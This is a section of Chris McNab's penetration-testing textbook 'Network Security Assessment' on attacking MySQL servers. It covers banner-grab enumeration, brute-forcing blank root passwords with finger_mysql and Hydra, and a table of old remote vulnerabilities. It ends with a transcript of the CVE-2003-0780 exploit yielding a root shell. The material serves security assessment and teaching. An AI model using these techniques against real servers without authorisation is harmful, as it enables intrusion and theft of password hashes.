8.11 MySQL


MySQL is commonly found running on TCP port 3306 on Linux and FreeBSD servers. The database is relatively straightforward to administer, with a much simpler access model than the heavyweight, but more scalable, Oracle.

8.11.1 MySQL Enumeration

The version of the target MySQL database can be easily gleaned simply by using nc or telnet to connect to port 3306 and analyzing the string received, as shown here:

# telnet 10.0.0.8 3306 Trying 10.0.0.8... Connected to 10.0.0.8. Escape character is '^]'. ( 3.23.52D~n.7i.G, Connection closed by foreign host.

The version of MySQL in this case is 3.23.52. If the server has been configured with a strict list of client systems defined, you will see a response like this:

# telnet db.example.org 3306 Trying 192.168.189.14... Connected to db.example.org. Escape character is '^]'. PHost 'cyberforce.segfault.net' is not allowed to connect to this MySQL server Connection closed by foreign host.

8.11.2 MySQL Brute Force

By default, the MySQL database accepts user logins as root with no password. A simple Unix-based utility called finger_mysql is useful for testing network blocks for MySQL instances that accept a blank root password, available in source form at http://www.securiteam.com/tools/6Y00L0U5PC.html.

Usefully, when the tool compromises the database, it lists the users and their password hashes from the mysql.user table. There are a number of tools in the Packet Storm archive that can be used to crack these encrypted passwords.

If a blank root password doesn't provide access, the Hydra utility can be used to launch a parallel MySQL brute-force attack.

By performing brute-force password grinding and assessment of the database configuration, MetaCoretex can also assess MySQL instances efficiently. If you are responsible for the security of database services, I highly recommend that you use MetaCoretex to provide assurances relating to remote attack.

8.11.3 MySQL Process-Manipulation Vulnerabilities

At the time of writing, the ISS X-Force database (http://xforce.iss.net) lists a number of serious, remotely exploitable vulnerabilities in MySQL (i.e., not authenticated or denial of service issues), as shown in Table 8-7.

Table 8-7. Serious remotely exploitable MySQL vulnerabilities

XF ID

Date

Notes

12337

12/06/2003

MySQL 4.x and prior mysql_real_connect( ) overflow

10848

12/12/2002

MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER password overflow

10847

12/12/2002

MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER authentication bypass

6418

09/02/2001

MySQL 3.22.33 and prior crafted client hostname overflow

4228

08/02/2000

MySQL 3.22.32 and prior unauthenticated remote access vulnerability

A recent vulnerability that isn't listed within the ISS X-Force database at the time of writing is CVE-2003-0780, which relates to a remote vulnerability in MySQL 3.23.56 and 4.0.15 and prior. An exploit for this issue is available at http://packetstormsecurity.org/0309-exploits/09.14.mysql.c.

Example 8-20 shows the exploit script in use against a vulnerable MySQL server, providing root access to the operating system. For exploit usage and options, simply run the tool with no arguments.

Example 8-20. Using the CVE-2003-0780 exploit against MySQL
# ./mysql -d 10.0.0.8 -p "" -t 1 @-------------------------------------------------@ #  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  # @ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @ --------------------------------------------------- [+] Connecting to mysql server 10.0.0.8:3306....ok [+] ALTER user column...ok [+] Select a valid user...ok [+] Found a user:test [+] Password length:480 [+] Modified password...ok [+] Finding client socket......ok [+] socketfd:3 [+] Overflow server....ok [+] sending OOB.......ok [+] Waiting a shell..... bash-2.05#


Network Security Assessment
Network Security Assessment: Know Your Network
ISBN: 059600611X
EAN: 2147483647
Year: 2006
Pages: 166
Authors: Chris McNab

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net